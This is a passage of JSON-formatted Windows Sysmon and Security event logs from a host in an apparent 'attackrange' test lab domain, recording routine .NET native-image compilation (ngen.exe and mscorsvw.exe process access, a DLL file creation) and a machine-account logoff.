.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:57.898","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21ED-5F25-0000-001099440A00}","TargetProcessId":"4252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6641,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:57.898\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21ED-5F25-0000-001099440A00}\r\nTargetProcessId: 4252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:57.898","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21ED-5F25-0000-001099440A00}","TargetProcessId":"4252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6642,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:57.914\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21ED-5F25-0000-001099440A00}\r\nTargetProcessId: 4252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:57.914","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21ED-5F25-0000-001099440A00}","TargetProcessId":"4252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6643,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:58.304\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21EE-5F25-0000-001079480A00}\r\nTargetProcessId: 2896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:58.304","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21EE-5F25-0000-001079480A00}","TargetProcessId":"2896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6644,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:58.304\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21EE-5F25-0000-001079480A00}\r\nTargetProcessId: 2896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:58.304","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21EE-5F25-0000-001079480A00}","TargetProcessId":"2896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6645,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:58.304\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21EE-5F25-0000-001079480A00}\r\nTargetProcessId: 2896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:58.304","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21EE-5F25-0000-001079480A00}","TargetProcessId":"2896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6646,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:03:58.976\r\nProcessGuid: {41C8662E-21EE-5F25-0000-001079480A00}\r\nProcessId: 2896\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b50-0\\System.Runtime.Remoting.dll\r\nCreationUtcTime: 2020-08-01 08:03:58.976","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:03:58.976","ProcessGuid":"{41C8662E-21EE-5F25-0000-001079480A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b50-0\\System.Runtime.Remoting.dll","CreationUtcTime":"2020-08-01 08:03:58.976","EventReceivedTime":"2020-08-01 08:04:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220709,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA3B10\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa3b10","LogonType":"3","EventReceivedTime":"2020-08-01 08:04:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6647,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:59.007\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21EF-5F25-0000-0010BF4C0A00}\r\nTargetProcessId: 4248\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:59.007","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21EF-5F25-0000-0010BF4C0A00}","TargetProcessId":"4248","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6648,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:59.007\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21EF-5F25-0000-0010BF4C0A00}\r\nTargetProcessId: 4248\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:59.007","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21EF-5F25-0000-0010BF4C0A00}","TargetProcessId":"4248","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
